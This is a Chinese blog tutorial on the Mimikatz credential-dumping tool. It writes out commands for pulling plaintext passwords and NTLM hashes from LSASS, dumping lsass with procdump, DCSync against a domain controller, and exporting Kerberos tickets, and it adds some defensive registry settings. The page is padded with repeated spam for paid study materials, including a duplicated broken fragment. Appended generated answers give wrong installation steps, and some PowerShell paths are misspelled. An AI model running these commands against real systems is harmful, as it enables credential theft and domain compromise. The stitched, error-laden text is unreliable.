内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

sid: 安全标识符模块
iis: IIS XML配置模块
rpc: mimikatz的RPC控制
sr98: 用于SR98设备和T5577目标的RF模块
rdm: RDM(830AL)器件的射频模块
acr: ACR模块
version: 查看版本
exit: 退出


\*\*提升权限 命令:privilege::debug \*\*


mimikatz许多功能都需要管理员权限,如果不是管理员权限不能debug  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021012816405872.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)


## 三、示例


### 抓取明文密码


在windows2012以上的系统不能直接获取明文密码了,当可以搭配procdump+mimikatz获取密码。



mimikatz # log
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords


**示例:windows server 2003**  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210128164356956.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)


**分析命令执行后的内容:**


\*\*msv:\*\*这项是账户对应密码的各种加密协议的密文,可以看到有LM、NTLM和SHA1加密的密文  
 \*\*tspkg,wdigest,kerberos:\*\*这个就是账户对应的明文密码了。有的时候这三个对应的也不是全部都是一样的,需要看服务器是什么角色。  
 \*\*SSP:\*\*是最新登录到其他RDP终端的账户和密码


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210128165415581.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)


### 模块


#### sekurlsa模块



sekurlsa::logonpasswords

抓取用户NTLM哈希
sekurlsa::msv

加载dmp文件,并导出其中的明文密码
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

导出lsass.exe进程中所有的票据
sekurlsa::tickets /export


#### kerberos模块



列出系统中的票据
kerberos::list
kerberos::tgt

清除系统中的票据
kerberos::purge

导入票据到系统中
kerberos::ptc 票据路径


#### lsadump模块



在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等
lsadump::dcsync /domain:kevin.com /user:root

(在域控上执行)读取所有域用户的哈希
lsadump::lsa /patch

从sam.hive和system.hive文件中获得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive

从本地SAM文件中读取密码哈希
token::elevate
lsadump::sam


#### wdigest


WDigest协议是在WindowsXP中被引入的,旨在与HTTP协议一起用于身份认证。默认情况下,Microsoft在多个版本的Windows(Windows XP-Windows 8.0和Windows Server 2003-Windows Server 2012)中启用了此协议,这意味着纯文本密码存储在LSASS(本地安全授权子系统服务)进程中。 Mimikatz可以与LSASS交互,允许攻击者通过以下命令检索这些凭据



mimikatz #privilege::debug
mimikatz #sekurlsa::wdigest


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210129161936943.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MDQxMjAzNw==,size_16,color_FFFFFF,t_70)  
 在windows2012系统以及以上的系统之后这个默认是关闭的如果在 win2008 之前的系统上打了 KB2871997 补丁,那么就可以去启用或者禁用 WDigest。Windows Server2012及以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。Windows Server2012以下版本,如果安装了KB2871997补丁,攻击者同样无法获取明文密码。配置如下键值:



HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest


UseLogonCredential 值设置为 0, WDigest 不把凭证缓存在内存;UseLogonCredential 值设置为 1, WDigest 就把凭证缓存在内存。  
 使用powershell进行更改



开启Wdigest Auth
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentCzontrolSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
关闭Wdigest Auth
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentCzontrolSet\Control\SecurityProvid


#### LSA保护


如何防止mimikatz获取一些加密的密文进行PTH攻击呢!其实微软推出的补丁KB2871997是专门针对PTH攻击的补丁,但是如果PID为500的话,还是可以进行PTH攻击的!本地安全权限服务(LSASS)验证用户是否进行本地和远程登录,并实施本地安全策略。 Windows 8.1及更高版本的系统中,Microsoft为LSA提供了额外的保护,以防止不受信任的进程读取内存或代码注入。Windows 8.1之前的系统,攻击者可以执行Mimikatz命令来与LSA交互并检索存储在LSA内存中的明文密码。


这条命令修改键的值为1,即使获取了debug权限吗,也不能直接获取明文密码和hash


reg add HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG\_DWORD /d 1 /f


#### 获取高版本Windows系统的密码凭证


使用procdump将lsass dump下来(需要管理员权限)



procdump.exe -accepteula -ma lsass.exe 1.dmp


使用mimikatz读取密码



mimikatz.exe “log” “sekurlsa::minidump 1.dmp” “sekurlsa::logonPasswords full” exit


#### msf中kiwi模块


注:kiwi默认加载32位,如果目标系统位64位,将进程迁移到64位程序的进程中。



### 如何自学黑客&网络安全


#### 黑客零基础入门学习路线&规划


**初级黑客**  
 **1、网络安全理论知识(2天)**  
 ①了解行业相关背景,前景,确定发展方向。  
 ②学习网络安全相关法律法规。  
 ③网络安全运营的概念。  
 ④等保简介、等保规定、流程和规范。(非常重要)


**2、渗透测试基础(一周)**  
 ①渗透测试的流程、分类、标准  
 ②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking  
 ③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察  
 ④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等


**3、操作系统基础(一周)**  
 ①Windows系统常见功能和命令  
 ②Kali Linux系统常见功能和命令  
 ③操作系统安全(系统入侵排查/系统加固基础)


**4、计算机网络基础(一周)**  
 ①计算机网络基础、协议和架构  
 ②网络通信原理、OSI模型、数据转发流程  
 ③常见协议解析(HTTP、TCP/IP、ARP等)  
 ④网络攻击技术与网络安全防御技术  
 ⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现


**5、数据库基础操作(2天)**  
 ①数据库基础  
 ②SQL语言基础  
 ③数据库安全加固


**6、Web渗透(1周)**  
 ①HTML、CSS和JavaScript简介  
 ②OWASP Top10  
 ③Web漏洞扫描工具  
 ④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)  
 恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k


到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?


如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!


**7、脚本编程(初级/中级/高级)**  
 在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.


如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。

**8、超级黑客**  
 这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。  
 ![img](https://img-blog.csdnimg.cn/img_convert/3fd39c2ba8ec22649979f245f4221608.webp?x-oss-process=image/format,png)


#### 网络安全工程师企业级学习路线


![img](https://img-blog.csdnimg.cn/img_convert/931ac5ac21a22d230645ccf767358997.webp?x-oss-process=image/format,png)  
 如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的


视频配套资料&国内外网安书籍、文档&工具


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

![img](https://img-blog.csdnimg.cn/img_convert/153b2778a3fe5198265bed9635d63469.webp?x-oss-process=image/format,png)  
 一些笔者自己买的、其他平台白嫖不到的视频教程。  
 ![img](https://img-blog.csdnimg.cn/img_convert/32eb4b22aa740233c5198d3c161b37e8.webp?x-oss-process=image/format,png)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
![img](https://img-blog.csdnimg.cn/img_convert/10c2876e61e708fb96f3ffba33c6320d.png)

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

8.webp?x-oss-process=image/format,png)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
[外链图片转存中...(img-9troEbSm-1713371597364)]

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 16
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: 这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能涉及到违法行为,请使用时慎重考虑。 ### 回答2: Mimikatz是一款用于提取Windows凭证的工具,它可以用来获取本地Windows用户和域用户的密码、NTLM哈希值和明文密码。本文将介绍如何通过Kali中的Mimikatz工具来实现提取凭证的操作。 1. 安装Mimikatz Mimikatz是Kali自带的工具,在终端中输入以下命令即可安装: ``` apt-get install mimikatz ``` 2. 运行Mimikatz 进入终端,输入以下命令来运行Mimikatz: ``` mimikatz ``` 如果你使用的是64位版本的系统,你还需要输入以下命令: ``` mimikatz # privilege::debug ``` 这个命令给你的用户添加更多的访问权限,也就是所谓的debug权限。 3. 提取凭证 接下来,你可以通过以下命令来提取凭证: ``` mimikatz # sekurlsa::logonpasswords ``` 这个命令输出本地计算机上所有用户的明文密码和NTLM哈希值。 如果你想获取域用户的凭证,可以使用以下命令: ``` mimikatz # sekurlsa::logonpasswords full ``` 这个命令输出域控制器上所有域用户的明文密码和NTLM哈希值。 4. 清除日志和关闭Mimikatz 运行Mimikatz时默认生成一些日志文件。如果你不希望这些日志留在计算机上,可以使用以下命令来清除日志: ``` mimikatz # log::clear ``` 最后,输入以下命令来关闭Mimikatz: ``` mimikatz # exit ``` 以上就是通过Kali中的Mimikatz工具来实现提取凭证的操作的详细教程。需要注意的是,Mimikatz是一款非常强大的工具,使用时请谨慎,避免造成不必要的损失。 ### 回答3: Kali是一个开源免费的渗透测试操作系统,而mimikatz是一个密码破解工具,常被黑客用于窃取用户密码,因此Kali与mimikatz结合使用可以进行密码破解和渗透测试。 首先,在Kali中下载安装mimikatz。打开终端,输入以下命令: git clone https://github.com/gentilkiwi/mimikatz.git 然后,进入mimikatz文件夹,编译mimikatz工具: cd mimikatz make 编译完成后,输入以下命令即可使用mimikatz: ./mimikatz 接下来,使用privilege模块提升权限: privilege::debug 然后,使用sekurlsa模块获取系统的登录凭据: sekurlsa::logonpasswords 最后,我们可以通过导出文件的方式保存密码信息,输入以下命令: sekurlsa::logonpasswords full log sekurlsa.log 这样就完成了在Kali中使用mimikatz的教程。需要注意的是,这种密码破解和窃取方法是非法的,只能在授权的渗透测试环境中使用。在实际的工作中,我们要始终遵循合法合规的原则,做好安全防护和风险评估工作,确保系统和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值